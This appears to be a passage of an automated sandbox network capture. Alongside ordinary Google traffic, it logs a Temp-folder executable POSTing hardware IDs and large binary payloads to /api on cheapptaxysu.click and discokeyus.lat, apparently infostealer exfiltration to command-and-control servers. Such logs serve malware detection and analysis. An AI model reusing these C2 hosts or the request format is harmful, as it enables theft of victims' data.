                                                                                                                                                                                                                                                            Data Ascii: 3d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC435INData Raw: 31 61 63 0d 0a 5f 2e 24 64 28 66 29 7c 7c 5f 2e 48 62 28 66 29 5c 75 30 30 32 36 5c 75 30 30 32 36 66 2e 6e 6f 64 65 54 79 70 65 5c 75 30 30 33 65 30 3f 64 28 66 29 3a 5f 2e 61 63 28 66 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 66 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 66 2e 69 74 65 6d 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 5f 2e 45 64 28 66 29 3a 66 2c 64 29 7d 7d 3b 5c 6e 5f 2e 70 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 6d 65 28 64 6f 63 75 6d 65 6e 74 2c 61 29 7d 3b 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33
                                                                                                                                                                                                                                                            Data Ascii: 1ac_.$d(f)||_.Hb(f)\u0026\u0026f.nodeType\u003e0?d(f):_.ac(f\u0026\u0026typeof f.length\u003d\u003d\"number\"\u0026\u0026typeof f.item\u003d\u003d\"function\"?_.Ed(f):f,d)}};\n_.pe\u003dfunction(a){return _.me(document,a)};_.me\u003dfunction(a,b){b\u003


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            65192.168.2.449978142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:24 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:24 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            66192.168.2.449984104.21.67.146443692C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC364OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=8I8E2ZT0
                                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=UK5f.kGqs4s6b_2zbAsIvGYwo4.3VSBZmtv09cMrxTk-1734815877-0.0.1.1-/api
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 128769
                                                                                                                                                                                                                                                            Host: cheapptaxysu.click
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC15331OUTData Raw: 2d 2d 38 49 38 45 32 5a 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 49 38 45 32 5a 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 49 38 45 32 5a 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 38 49 38 45 32 5a 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                                            Data Ascii: --8I8E2ZT0Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--8I8E2ZT0Content-Disposition: form-data; name="pid"1--8I8E2ZT0Content-Disposition: form-data; name="lid"CZJvss--geopoxid--8I8E2ZT0Content-Dispo
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC15331OUTData Raw: 08 54 8b 48 50 63 bb 48 5c 3e a1 ef 80 f0 bd 43 15 8a 11 9b b2 30 70 c3 4d a5 03 40 64 e5 f5 a7 5d 5e 37 24 9c 93 21 5c 9a b4 3f 0c c5 ae 1c 0a c3 da fa 6f e6 d8 3f 83 38 71 5e a4 b8 dd 0f 6d ef 0b 96 60 28 0b bf 6a 3f bc ae 0b b8 2e f0 38 22 f4 10 93 4c 61 97 e6 dc 73 25 97 55 f6 87 e2 20 7a 15 06 60 02 58 8e 9e a7 e5 ea a9 bc 76 0e 52 76 9a 4f ef 11 46 47 2b 89 bb 59 44 d6 98 ed 76 16 fd 00 22 ac b0 d9 23 87 ab 80 06 d1 3a 0a 33 85 5e d6 77 2c 6b 92 bb 30 62 bb 1a eb 4c d1 7c 14 c6 d1 d1 b0 26 2f b1 46 0d 28 8a c8 8c cc a7 e5 5b 76 08 c9 62 3a 80 16 28 70 0b ae 69 15 46 dd b6 7e 69 8e 99 95 73 95 87 dd 6a ec d9 b1 e1 d0 d1 c6 57 2b b9 0b 66 36 eb 85 bc 36 59 9b 89 c9 c1 1e d5 f9 8d 4a ba f6 e3 26 43 e7 96 1f 56 0e 51 cb d9 35 05 76 29 f8 d1 cf f0 1c bb
                                                                                                                                                                                                                                                            Data Ascii: THPcH\>C0pM@d]^7$!\?o?8q^m`(j?.8"Las%U z`XvRvOFG+YDv"#:3^w,k0bL|&/F([vb:(piF~isjW+f66YJ&CVQ5v)
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC15331OUTData Raw: d9 46 87 b8 c3 af 57 d8 6f 7a f3 10 50 fd b2 a3 85 6b 91 36 05 50 2d c7 fc 73 31 f5 a7 ff 7d b1 3f 06 10 be 7c ad 80 78 21 66 c1 6c 01 f3 a2 7e 4f c8 1d 3d 19 10 fd b3 01 64 a7 8e a4 6d 06 70 92 1b f4 5a 57 5c bf d7 92 3e bb d3 a6 ca ed 40 8e 30 e1 97 b0 fa bb e8 ff bb 13 79 dd 85 75 02 f0 5c 08 05 90 25 84 01 95 74 91 e6 d2 5a ca 10 ce 43 d0 34 98 62 97 c6 df e2 28 be 87 fc 76 84 b4 0e db b1 f8 04 f9 1f 88 8d 58 63 ab c9 10 83 a4 72 ba c4 0a ab fe 40 90 b3 81 03 65 0b 65 12 71 a1 81 a4 aa 03 67 c7 ca 11 0d 32 8a 7b b7 38 1a 45 c0 4e c7 d0 85 a2 3a 1a 65 41 84 03 25 03 b7 39 5c 29 00 10 3e b0 02 47 fb 35 23 74 c0 7c 8d f0 f8 98 f8 df 9f 41 7b e9 5f 9f 71 0f b6 b1 30 c4 7d 16 ec dc 2b fd c0 7d 20 84 03 15 54 79 b6 8d cd d3 81 50 5f 41 ce 42 02 f4 c6 23 a9
                                                                                                                                                                                                                                                            Data Ascii: FWozPk6P-s1}?|x!fl~O=dmpZW\>@0yu\%tZC4b(vXcr@eeqg2{8EN:eA%9\)>G5#t|A{_q0}+} TyP_AB#
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC15331OUTData Raw: b2 c4 6b ff db 7b d1 af 69 c7 3b 40 3c 42 a7 d5 bd f6 62 c0 08 e1 e1 ce b4 f3 f2 ba e6 44 bb 6a 2c fe 94 06 d5 2a 56 72 7e 6f 3d fc 26 f4 d7 8b a8 b6 0f 7e b8 de 54 16 c2 93 9d 7c 97 ef b4 ab 5b 5d 13 ee 3f d8 78 56 de d1 b7 ae c7 49 41 37 5a 07 d4 2b 17 cb 0f 5c 66 5b 0d 54 44 e7 5d 0e 42 4b 54 0f 38 a3 dd 54 09 03 8c 06 4c c9 47 ae a5 34 9e 1e 77 46 65 2f 81 12 80 00 51 02 48 84 80 bd f1 5b b1 be af 26 7c e5 d4 a4 e1 77 67 6d 40 9d 7b 93 48 d0 a7 29 d0 5e bd 3c 3b c2 f8 fb 64 f6 39 1b c5 0f 3a f5 f1 46 87 36 26 41 bb 0a 27 4d ad 75 57 c4 8d 19 55 9e 93 70 04 2d d8 ac c4 9f 89 74 da 68 15 92 bf ab ec d7 c8 a4 3e 1b da 4e bd 82 5c fc 9e 13 39 e2 f5 db 47 a3 75 54 f4 bc aa a1 fc 56 b3 e7 c3 b4 9d df f8 aa 1d 69 42 64 d4 eb aa 24 82 19 99 f9 d1 97 1b c7 1f
                                                                                                                                                                                                                                                            Data Ascii: k{i;@<BbDj,*Vr~o=&~T|[]?xVIA7Z+\f[TD]BKT8TLG4wFe/QH[&|wgm@{H)^<;d9:F6&A'MuWUp-th>N\9GuTViBd$
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC15331OUTData Raw: e6 8b 56 b7 3b 1b c0 65 c8 13 ed 1c e6 f4 9f 3b bb d7 63 0a 51 37 87 90 73 fd 54 f0 a2 30 47 c3 31 64 87 77 94 6e c7 6f 17 c1 07 5c 16 67 18 60 c8 93 9e fd 26 15 fc ac 6e 75 7d 7c 99 c0 ed cc ac d2 5d b9 45 e9 61 8f fb 97 de c1 a5 16 01 a3 c3 8f d2 0b 25 3e d4 88 39 35 77 3f 8c eb de b9 7e f1 e9 6e e1 ca 2f ea 3e 7e a5 28 e7 8b 11 f4 8d b3 5f 9c cb b0 90 45 d8 83 8f 3a 0c cf 72 6d 4e 2c 6e 18 33 0f 6f c4 07 0c ae dd fe 4c 8a 14 0a ac 6f bf e5 f9 ec 21 1b 9e d3 d7 2c ef f9 6d 1f 43 23 c3 2c 95 b2 b4 af b5 bb cc 3b 53 8c 6a 6f 7b 7f 70 2d 1e 3d 7a f5 f5 2d 59 8c a1 59 d9 35 dc a3 87 6b 15 07 2b 20 d7 e0 93 cb 93 bb f1 50 58 14 ad 48 4f 8d e4 82 d9 35 2e 77 ab 90 6a c1 86 b7 3c 1b 4b 98 4d d5 52 db b8 e7 a1 ae e5 f2 91 1f f3 b9 19 9b c2 1d dc b7 22 d1 87 bc
                                                                                                                                                                                                                                                            Data Ascii: V;e;cQ7sT0G1dwno\g`&nu}|]Ea%>95w?~n/>~(_E:rmN,n3oLo!,mC#,;Sjo{p-=z-YY5k+ PXHO5.wj<KMR"
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC15331OUTData Raw: 95 3e 26 30 ac 09 48 6c 69 2c 84 1e 8d 64 9e 92 80 58 85 0a 01 a5 2f 43 a9 17 7a c2 3d 7e db f4 f9 2c a9 64 b1 02 96 13 97 df 7f 34 e9 9a 26 e8 b7 15 aa dc 6d 60 72 fd 94 a0 76 ae 42 8b d3 5f 51 6d bf c6 ae 3f 5f 83 31 be 17 2c d5 0f d5 9b b5 d5 0e 88 ef 70 69 d5 bb b7 8c 01 fa 32 0b d9 6f 54 93 74 bb d6 27 99 e4 7b b7 99 94 5c 4d 6a fb f6 ac c3 f6 85 47 6b c1 d7 d9 7a 5b b7 d7 09 0e b4 de 1f 8f 2b 2d a2 f4 92 5d a0 98 fa 2f cb da 98 37 ed a7 bd 7a fb 94 fe 2c 54 35 42 ec 8d fb c1 02 84 7f 16 2d 78 52 12 d8 b1 8a c2 05 eb 24 d5 14 d1 35 95 d7 ef 9b 98 14 82 02 e5 f7 b3 e3 f4 56 0c ab 52 8b a6 a9 bf 43 56 31 df af 89 c2 21 5c 3b 3d e1 d3 34 0a 01 e1 ac 34 3d df c5 32 a5 98 41 3f f2 8c f2 44 4f 8a 8b cc 79 dc f1 79 86 cd ea de 10 4e 51 db e7 fe 13 a6 4a a8
                                                                                                                                                                                                                                                            Data Ascii: >&0Hli,dX/Cz=~,d4&m`rvB_Qm?_1,pi2oTt'{\MjGkz[+-]/7z,T5B-xR$5VRCV1!\;=44=2A?DOyyNQJ
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC15331OUTData Raw: 82 a4 2d e7 4a 06 f2 ff d8 94 54 f8 d0 06 77 ee 7c 63 fc c7 42 44 19 ea 53 3f 32 73 1e a0 b2 a4 9d 52 dd e0 eb b1 b4 f4 43 4b 96 0c 13 25 a2 cc ff 75 e7 fe ba 04 0b 68 c5 d4 32 12 3f 34 9a a5 65 8c 1f fc ee 8b 2e 38 08 72 ec 51 80 d6 bf 58 81 90 69 01 d9 e8 d0 4a f8 79 84 e0 fe bc 99 2e 4e 7c b6 da ae 3f ac f8 5d 39 48 a7 73 9e e0 8d b8 81 fc 7f a5 ce 8c d9 78 67 07 6c 40 e8 21 f6 16 04 bf bc 91 ce 92 2b 68 4d 2f 98 37 f2 8d 9b 73 59 a5 94 e0 b2 19 0c 92 47 b3 dd f6 fe e9 1b 5f 64 9d 8b 12 16 17 21 56 67 fb 95 a1 f8 6c 78 4e 89 3b d6 1f 78 c4 6f 75 30 74 b3 45 c1 6e 42 06 58 89 9f 55 e5 c2 71 e1 2e 34 a0 a4 ec 76 27 99 b8 01 c1 7e 7c 72 d7 df e5 8a 49 29 40 d1 8f af d0 fc e9 69 cc d7 5f da bd 49 f4 d5 2a 6d 3f 01 27 7a f5 fe a9 65 ee 42 75 85 7c a0 64 85
                                                                                                                                                                                                                                                            Data Ascii: -JTw|cBDS?2sRCK%uh2?4e.8rQXiJy.N|?]9Hsxgl@!+hM/7sYG_d!VglxN;xou0tEnBXUq.4v'~|rI)@i_I*m?'zeBu|d
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC15331OUTData Raw: c6 2a 13 fa 39 16 47 fb cb 9b 1c 68 22 85 33 cf af 6f 38 2c 7a 77 df a0 5d 5a e1 7a d5 ed 98 41 67 11 28 a5 f0 e6 64 95 eb 75 f0 a3 1b 55 31 ec de 5d 9f 33 6e 5f d7 1a 45 32 66 6d b1 8e c9 61 c3 7b 61 07 6f 26 da ee 94 af 84 7a 96 b5 54 d9 07 0a 79 f6 33 af c5 a2 f6 e3 f8 aa 4c 31 cf cd 97 3d 86 72 08 b9 7a 7e 4b c9 3c 86 cc 69 e1 78 21 44 01 7a 2e a6 9f f2 86 fd ae d1 ee b4 c9 ca d3 40 3b 3d 74 f8 fe 73 c2 1c 05 d7 ef f6 20 64 e7 88 d8 3e 21 aa fc f5 4f d5 82 4f 65 37 5a f5 98 e5 f3 2e f8 93 66 42 07 de f7 a2 7d 1c 72 6a e4 99 45 db a7 b4 16 c8 5b 52 b9 57 0b d4 98 f7 1f d8 90 6b 57 e9 48 44 45 4e cb a5 df 4f d0 40 fb 58 68 5d 60 d3 e5 a3 b8 de 60 f3 b1 f1 e8 bd 6f e6 af a5 29 d7 24 b8 da 71 3f a1 43 4e 8e 6c 70 03 ed e3 aa ff ed 3e 4f 8d c0 da 5c c3 31
                                                                                                                                                                                                                                                            Data Ascii: *9Gh"3o8,zw]ZzAg(duU1]3n_E2fma{ao&zTy3L1=rz~K<ix!Dz.@;=ts d>!OOe7Z.fB}rjE[RWkWHDENO@Xh]``o)$q?CNlp>O\1
                                                                                                                                                                                                                                                            2024-12-21 21:18:26 UTC6121OUTData Raw: b4 d7 ef 31 e9 22 d9 be 51 35 b7 60 6f 8d 65 76 3d b7 6d 0b 90 2c c9 d0 4a 3e 6f 25 ae 71 32 29 f8 48 b4 96 3d 8d e0 d8 aa ff e7 7b d5 da 21 7f fa 20 c9 73 c8 72 26 ce 38 f9 89 18 3c 54 f7 18 e3 e1 e1 7d 7c 61 60 e7 e2 04 c4 fc a9 e4 50 0f ec b1 d0 89 c7 47 40 50 ef d5 a5 f5 c7 f2 d6 e9 7c 77 e7 44 d8 fe a8 f6 d4 c2 af 3d 71 cc c3 cb d9 e7 b2 73 e5 51 d9 9f b3 c3 29 e5 e6 88 d1 09 6b 1d d6 ca b8 27 02 2c 3a cb 73 b2 ca b8 9d 9e 6f e8 b6 e1 cf 88 a5 c4 ba 8e 25 82 2e f9 a9 b8 89 fd f1 a6 14 f7 b5 a1 48 77 ad 34 83 7f 25 b0 0a d3 86 b1 c3 e6 55 32 a0 61 0e 5a 97 01 eb 70 5f 70 26 a3 34 80 ea a2 d6 fb 69 ad 83 9f 19 c5 a9 cc e2 59 00 2c 16 9b f4 fa 35 51 a1 56 a6 9e 3c d6 f7 68 5d d7 01 fb 23 30 29 2d 8d ee 2b 2d d2 17 ff 23 02 65 af d3 db 1a 58 31 15 48 cc
                                                                                                                                                                                                                                                            Data Ascii: 1"Q5`oev=m,J>o%q2)H={! sr&8<T}|a`PG@P|wD=qsQ)k',:so%.Hw4%U2aZp_p&4iY,5QV<h]#0)-+-#eX1H
                                                                                                                                                                                                                                                            2024-12-21 21:18:27 UTC1140INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:27 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=is58b1u3tjgsd160kokijs51co; expires=Wed, 16 Apr 2025 15:05:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BT3kAbC9W4Hl%2B8sGLgn96vAfEMRq8Pqw0p%2B5MBKHEmtqjDX7Xw9scwRcvoJcL8wssYrgAx8j3EiMOFGp%2BXjiJmCnWEX1en%2B6EJ2IQgqTlYte7ifpWVzUBp%2BlN9P56LMGOH4hMKw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7973c5d7d14-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=1988&rtt_var=780&sent=68&recv=135&lost=0&retrans=0&sent_bytes=2843&recv_bytes=130121&delivery_rate=1468812&cwnd=245&unsent_bytes=0&cid=ce9e064546e909f9&ts=1789&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            67192.168.2.449987104.21.21.99443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:27 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=YXKO1HRF1YZ
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20395
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:27 UTC15331OUTData Raw: 2d 2d 59 58 4b 4f 31 48 52 46 31 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 58 4b 4f 31 48 52 46 31 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 58 4b 4f 31 48 52 46 31 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 58 4b 4f 31 48 52 46 31 59 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: --YXKO1HRF1YZContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--YXKO1HRF1YZContent-Disposition: form-data; name="pid"3--YXKO1HRF1YZContent-Disposition: form-data; name="lid"PsFKDg--pablo--YXKO1HRF1YZCont
                                                                                                                                                                                                                                                            2024-12-21 21:18:27 UTC5064OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb
                                                                                                                                                                                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                                                                                                                                                                                            2024-12-21 21:18:28 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:28 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=hendu61fl1dqtdf8te8b7i7gum; expires=Wed, 16 Apr 2025 15:05:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nguMYbyQy%2BESu9nWHZ%2FvZzl68ohrJQ8uo6BuDBZL5pe%2Fdegv1j7sL2XgIktHso87mr5KxUxJPk4HbV76WFO%2FXnHlibMWgx57xSNF6MlLSDptmjXpToQG%2FsrvKTFGlSgvIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7a1ad3a72a5-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1962&rtt_var=744&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21348&delivery_rate=1463659&cwnd=203&unsent_bytes=0&cid=69f0c3029e805379&ts=1029&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            68192.168.2.449990104.21.67.146443692C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:29 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=UK5f.kGqs4s6b_2zbAsIvGYwo4.3VSBZmtv09cMrxTk-1734815877-0.0.1.1-/api
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
